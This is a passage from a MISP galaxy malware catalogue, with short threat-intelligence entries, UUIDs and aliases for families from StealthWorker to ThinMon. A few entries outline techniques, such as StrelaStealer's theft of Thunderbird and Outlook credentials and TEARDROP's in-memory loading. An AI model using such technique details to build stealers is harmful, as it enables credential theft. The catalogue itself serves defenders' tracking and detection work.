According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.

Internal MISP references

UUID d1c5a299-c072-44b5-be31-d03853bca5ea which can be used as unique global reference for StealthWorker Go in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stealth Soldier

Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.

Internal MISP references

UUID 07a24653-0f0b-49cf-944d-b4686b7e48d0 which can be used as unique global reference for Stealth Soldier in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SteamHide

Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.

Internal MISP references

UUID 4729fb59-44a8-4d2f-9914-cd93fc528888 which can be used as unique global reference for SteamHide in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StegoLoader

Internal MISP references

UUID aea21616-061d-4177-9512-8887853394ed which can be used as unique global reference for StegoLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stinger

Internal MISP references

UUID 82ab5235-a71e-4692-a08c-8db337d8b53a which can be used as unique global reference for Stinger in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger - webarchive

Associated metadata

Metadata key	Value
type	[]

STONEBOAT

According to Mandiant, STONEBOAT is an installer for DICELOADER. It is written in .NET and drops its payload in-memory.

Internal MISP references

UUID c4286ab0-748a-4473-b4a6-ac4426f73393 which can be used as unique global reference for STONEBOAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StoneDrill

Internal MISP references

UUID 0c5bc5c8-5136-413a-bc5a-e13333271f49 which can be used as unique global reference for StoneDrill in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STOP

STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular STOP.

Known Synonyms
`Djvu`
`KeyPass`

Internal MISP references

UUID 447e5d7d-dd23-43b3-8cbc-b835498a49dd which can be used as unique global reference for STOP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stormwind

Internal MISP references

UUID 98d5a891-f4dd-4c87-a019-1f1e7ab59301 which can be used as unique global reference for Stormwind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STOWAWAY

According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering.

Internal MISP references

UUID cd187108-c557-42f8-8e48-1993abb37720 which can be used as unique global reference for STOWAWAY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stration

Internal MISP references

UUID 0439c5ec-306e-4473-84f7-50bdb5539fc2 which can be used as unique global reference for Stration in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.stration - webarchive

Associated metadata

Metadata key	Value
type	[]

STRATOFEAR

Internal MISP references

UUID a968a42e-4162-46db-a96e-2a45927d1cd7 which can be used as unique global reference for STRATOFEAR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StrelaStealer

According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.

Following successful infiltration, StrelaStealer searches for "logins.json" (account/password) and "key4.db" (password database) within the "%APPDATA%\Thunderbird\Profiles\" directory - by doing so, it can acquire the credentials for Thunderbird.

Alternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program's key and "IMAP User", "IMAP Server", as well as the "IMAP Password" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.

Internal MISP references

UUID 17f84079-56b8-4be5-bc59-75c8526b0ce0 which can be used as unique global reference for StrelaStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stresspaint

Internal MISP references

UUID 00dedcea-4f87-4b6d-b12d-7749281b1366 which can be used as unique global reference for Stresspaint in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StrifeWater RAT

Internal MISP references

UUID 5627aff2-7e1d-4b11-81f5-33cd7febdd76 which can be used as unique global reference for StrifeWater RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StrikeSuit Gift

Internal MISP references

UUID ec2a5a29-a142-447c-85b9-ec47e78f9cb2 which can be used as unique global reference for StrikeSuit Gift in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StrongPity

According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.

Internal MISP references

UUID da2969f2-01e9-4ca8-b2f3-5fc9a9891d57 which can be used as unique global reference for StrongPity in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stuxnet

Internal MISP references

UUID 6ad84f52-0025-4a9d-861a-65c870f47988 which can be used as unique global reference for Stuxnet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Subzero

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Subzero.

Known Synonyms
`Corelump`
`Jumplump`

Internal MISP references

UUID 72fb9dd2-33bf-4620-bf03-92630d7da101 which can be used as unique global reference for Subzero in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUCEFUL

Internal MISP references

UUID efe586da-a272-4898-9ebb-587f8f5a23ca which can be used as unique global reference for SUCEFUL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sugar

Ransomware, written in Delphi.

Internal MISP references

UUID ea7d0457-3625-4224-aed4-739a360b10d3 which can be used as unique global reference for Sugar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUGARDUMP

According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.

Internal MISP references

UUID 655c3dbb-8d2c-4613-8722-ec12b24d5956 which can be used as unique global reference for SUGARDUMP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUGARRUSH

According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.

Internal MISP references

UUID 129163aa-8539-40ee-a627-0ac6775697b5 which can be used as unique global reference for SUGARRUSH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUNBURST

FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SUNBURST.

Known Synonyms
`Solorigate`

Internal MISP references

UUID 34e50688-6955-4c28-8e18-50252e5ea711 which can be used as unique global reference for SUNBURST in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SunCrypt

According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.

Internal MISP references

UUID 018fb88b-a3cd-46b7-adea-a5b85302715b which can be used as unique global reference for SunCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SunOrcal

Internal MISP references

UUID a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4 which can be used as unique global reference for SunOrcal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SunSeed

According to Proofpoint, this is a Lua-based malware likely used by a nation-state sponsored attacker used to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.

Internal MISP references

UUID a89f7e01-b049-4d09-aca3-ce19d91c4544 which can be used as unique global reference for SunSeed in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SuperBear RAT

Internal MISP references

UUID a6ca0a04-359d-4f7a-b556-46b33ec75473 which can be used as unique global reference for SuperBear RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUPERNOVA

According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.

Internal MISP references

UUID 62674a18-54c6-4c57-84cc-ea6a3bb2d6d6 which can be used as unique global reference for SUPERNOVA in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SuppoBox

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SuppoBox.

Known Synonyms
`Bayrob`
`Nivdort`
`pizd`

Internal MISP references

UUID dd9939a4-df45-4c7c-8a8d-83b40766aacd which can be used as unique global reference for SuppoBox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

surtr

According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the ".SURT" extension to filenames.

Internal MISP references

UUID 8666afcc-8cc2-4856-83de-b7e8b4309367 which can be used as unique global reference for surtr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SVCReady

According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.

Internal MISP references

UUID 20157c10-2a5f-49d9-baf5-d350fb65c06e which can be used as unique global reference for SVCReady in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SweetSpecter

Internal MISP references

UUID 5ba81060-0eba-4811-b1cb-6b21edd7ed5b which can be used as unique global reference for SweetSpecter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

swen

Internal MISP references

UUID 63657a3b-1f8f-422d-80de-fe4644f5d7ba which can be used as unique global reference for swen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SwiftSlicer

According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SwiftSlicer.

Known Synonyms
`JaguarBlade`

Internal MISP references

UUID dba43d45-053f-4225-b813-ff7727b2b7d2 which can be used as unique global reference for SwiftSlicer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sword

Internal MISP references

UUID 2112870f-06f1-44a9-9c43-6cc4fb90e295 which can be used as unique global reference for Sword in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sykipot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sykipot.

Known Synonyms
`Wkysol`
`getkys`

Internal MISP references

UUID 99ffeb75-8d21-43a2-b5f7-f58bcbac2228 which can be used as unique global reference for sykipot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SynAck

Internal MISP references

UUID a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2 which can be used as unique global reference for SynAck in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SyncCrypt

Internal MISP references

UUID e717a26d-17aa-4cd7-88de-dc75aa365232 which can be used as unique global reference for SyncCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SynFlooder

Internal MISP references

UUID d327b4d9-e1c8-4c71-b9fe-775d1607e7d4 which can be used as unique global reference for SynFlooder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Synth Loader

Internal MISP references

UUID ffd74637-b518-4622-939b-c0669a81f3a9 which can be used as unique global reference for Synth Loader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader - webarchive

Associated metadata

Metadata key	Value
type	[]

Sys10

Internal MISP references

UUID 2ae57534-6aac-4025-8d93-888dab112b45 which can be used as unique global reference for Sys10 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Syscon

SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group.

Internal MISP references

UUID 4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6 which can be used as unique global reference for Syscon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysGet

Internal MISP references

UUID a4b9c526-42d0-4de9-ab8e-e78f99655d11 which can be used as unique global reference for SysGet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysJoker (Windows)

Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.

Internal MISP references

UUID 16387289-9064-4ae9-8493-0a3623cdfd9a which can be used as unique global reference for SysJoker (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysKit

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SysKit.

Known Synonyms
`IvizTech`
`MANGOPUNCH`

Internal MISP references

UUID 4922f27b-a97c-4d6b-9425-1705f4716ee0 which can be used as unique global reference for SysKit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sysraw Stealer

Sysraw stealer got its name because at some point, it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named "1?[-+].dat" and POSTs them.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysraw Stealer.

Known Synonyms
`Clipsa`

Internal MISP references

UUID f90e9fb9-d60d-415e-9f7f-786ee45f6947 which can be used as unique global reference for Sysraw Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sysrv-hello (Windows)

Sysrv is a Golang written Cryptojacking malware. There are Windows and Linux variants.

Internal MISP references

UUID cabc5944-195e-4939-a00f-a3cd6758f308 which can be used as unique global reference for Sysrv-hello (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysScan

Internal MISP references

UUID 7007b268-f6f4-4a01-9184-fc2334461c38 which can be used as unique global reference for SysScan in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan - webarchive

Associated metadata

Metadata key	Value
type	[]

SystemBC

SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.

SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SystemBC.

Known Synonyms
`Coroxy`
`DroxiDat`

Internal MISP references

UUID cd0ad49d-7f79-45e0-91ba-c5eecdabe3aa which can be used as unique global reference for SystemBC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Szribi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Szribi.

Known Synonyms
`Srizbi`

Internal MISP references

UUID 66b1094f-7779-43ad-a32b-a9414babcc76 which can be used as unique global reference for Szribi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

T34loader

Internal MISP references

UUID fe3abd7c-97d6-42b9-b556-057e5588b550 which can be used as unique global reference for T34loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TabMsgSQL

Internal MISP references

UUID 48aa9c41-f420-418b-975c-1fb6e2a91145 which can be used as unique global reference for TabMsgSQL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

taidoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular taidoor.

Known Synonyms
`simbot`

Internal MISP references

UUID 94323b32-9566-450b-8480-5f9f53b57948 which can be used as unique global reference for taidoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TAINTEDSCRIBE

Internal MISP references

UUID 014940fb-6e31-408a-962f-71914d0eb2f5 which can be used as unique global reference for TAINTEDSCRIBE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Taleret

Internal MISP references

UUID b0467c03-824f-4071-8668-f056110d2a50 which can be used as unique global reference for Taleret in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tandfuy

Internal MISP references

UUID 88ff523e-206b-4918-8c93-e2829427eef2 which can be used as unique global reference for Tandfuy in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy - webarchive

Associated metadata

Metadata key	Value
type	[]

Tapaoux

Internal MISP references

UUID 71e77349-98f5-49c6-bff7-6ed3b3d79410 which can be used as unique global reference for Tapaoux in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux - webarchive

Associated metadata

Metadata key	Value
type	[]

TargetCompany

This ransomware uses a combination of different crypto algorithms (ChaCha20, AES-128, Curve25519). The activity of this malware is dated to mid-June 2021. The extension of the encrypted files are set to the compromised company: . A decryptor was released on 2022-02-07 by AVAST

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TargetCompany.

Known Synonyms
`Fargo`
`Mallox`
`Tohnichi`

Internal MISP references

UUID 77af876d-84c5-4da3-a2b0-2fe5c77f758c which can be used as unique global reference for TargetCompany in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tarsip

Internal MISP references

UUID ea6a62b2-db33-4d60-9823-5117c20b6457 which can be used as unique global reference for Tarsip in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Taurus Stealer

According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.

Internal MISP references

UUID 68b89458-f78e-41b3-b0ee-c193aaa948f9 which can be used as unique global reference for Taurus Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TClient

Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TClient.

Known Synonyms
`FIRESHADOW`

Internal MISP references

UUID fc551237-8db7-4cfd-a915-9e8410abb313 which can be used as unique global reference for TClient in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

tDiscoverer

F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular tDiscoverer.

Known Synonyms
`HAMMERTOSS`
`HammerDuke`

Internal MISP references

UUID bbbf4786-1aba-40ac-8ad7-c9d8c66197a8 which can be used as unique global reference for tDiscoverer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TDTESS

Internal MISP references

UUID 99d83ee8-6870-4af2-a3c8-cf86baff7cb3 which can be used as unique global reference for TDTESS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeamSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamSpy.

Known Synonyms
`TVRAT`
`TVSPY`
`TeamViewerENT`

Internal MISP references

UUID 9a82b6f6-2fdf-47bc-af05-cf7ce225fc96 which can be used as unique global reference for TeamSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TEARDROP

TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.

Internal MISP references

UUID efa01fef-7faf-4bb2-8630-b3a237df882a which can be used as unique global reference for TEARDROP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TefoSteal

Internal MISP references

UUID aaa05037-aee1-4353-ace1-43ae0f558091 which can be used as unique global reference for TefoSteal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TelAndExt

According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.

Internal MISP references

UUID b2b5a816-2268-4cb8-9958-491356c452ec which can be used as unique global reference for TelAndExt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TelB

According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.

Internal MISP references

UUID daf2f70b-205e-4b39-89a6-d382ded4c33c which can be used as unique global reference for TelB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeleBot

Internal MISP references

UUID 06e0d676-8160-4b65-b6ea-d7634c962809 which can be used as unique global reference for TeleBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeleDoor

Internal MISP references

UUID b71f1656-975a-4daa-8109-00c30fd20410 which can be used as unique global reference for TeleDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TelegramGrabber

Internal MISP references

UUID 48352761-a92f-43b4-931d-249ac9eae8b2 which can be used as unique global reference for TelegramGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Telemiris

Internal MISP references

UUID f39400a3-3b27-4dc6-bccd-aa277ca99f28 which can be used as unique global reference for Telemiris in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Teleport

Cisco Talos reports that this is a data exfiltration tool used by TA505.

Internal MISP references

UUID b6a2a1ea-6cdb-4cbd-a9a6-539c7db1c6de which can be used as unique global reference for Teleport in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TellYouThePass

According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.

The program renames all encrypted files by adding the ".locked" extension and creates a ransom message in a text file called "README.html". For example, "1.jpg" is renamed by Tellyouthepass to "1.jpg.locked".

According to cyber criminals, this ransomware encrypts data using RSA-1024 and AES-256 cryptography algorithms.

Internal MISP references

UUID fa1dbbef-c2b0-44a2-8457-764dfc99be17 which can be used as unique global reference for TellYouThePass in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tempedreve

Internal MISP references

UUID 26b2c2c0-036e-4e3a-a465-71a391046b74 which can be used as unique global reference for Tempedreve in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve - webarchive

Associated metadata

Metadata key	Value
type	[]

TEMPLEDOOR

Internal MISP references

UUID 13df1034-baf2-4214-81a9-283f6219356c which can be used as unique global reference for TEMPLEDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TempStealer

According to Cyble, this is a stealer targeting several crypto currency wallets along browser data.

Internal MISP references

UUID a27b7e55-6036-4c4a-96b2-0a99df878fe0 which can be used as unique global reference for TempStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Terminator RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Terminator RAT.

Known Synonyms
`Fakem RAT`

Internal MISP references

UUID b127028b-ecb1-434b-abea-e4df3ca458b9 which can be used as unique global reference for Terminator RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Termite

Internal MISP references

UUID c0801a29-ecc4-449b-9a1b-9d2dbde1995d which can be used as unique global reference for Termite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TerraPreter

Internal MISP references

UUID 8036e023-c765-4bd6-828f-1c8d20987843 which can be used as unique global reference for TerraPreter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TerraLoader

Internal MISP references

UUID ddfda5dc-a416-4cf3-b734-6aa083aa9e04 which can be used as unique global reference for TerraLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TerraRecon

According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraRecon.

Known Synonyms
`Taurus Loader Reconnaissance Module`

Internal MISP references

UUID d8efa615-87bf-4477-8261-316215c0b637 which can be used as unique global reference for TerraRecon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TerraStealer

According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraStealer.

Known Synonyms
`SONE`
`StealerOne`
`Taurus Loader Stealer Module`

Internal MISP references

UUID d5c9a697-c7bf-4e13-8c2e-c74465e77208 which can be used as unique global reference for TerraStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TerraTV

TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraTV.

Known Synonyms
`Taurus Loader TeamViewer Module`

Internal MISP references

UUID 0597af12-88d2-4289-a154-191774e3f48d which can be used as unique global reference for TerraTV in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeslaCrypt

According to Kaspersky, detected in February 2015, the new ransomware Trojan gained immediate notoriety as a menace to computer gamers. Amongst other types of target files, it tries to infect typical gaming files: game saves, user profiles, recoded replays etc. That said, TeslaCrypt does not encrypt files that are larger than 268 MB. Recently,

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeslaCrypt.

Known Synonyms
`cryptesla`

Internal MISP references

UUID bd79d5be-5c2f-45c1-ac99-0e755a61abad which can be used as unique global reference for TeslaCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TFlower

TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.

Internal MISP references

UUID bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2 which can be used as unique global reference for TFlower in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Thanatos

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Thanatos.

Known Synonyms
`Alphabot`

Internal MISP references

UUID 24fabbe0-27a2-4c93-a6a6-c14767efaa25 which can be used as unique global reference for Thanatos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Thanatos Ransomware

Internal MISP references

UUID 0884cf65-564e-4ee2-b4e5-b73f8bbd6a34 which can be used as unique global reference for Thanatos Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThinMon

Internal MISP references

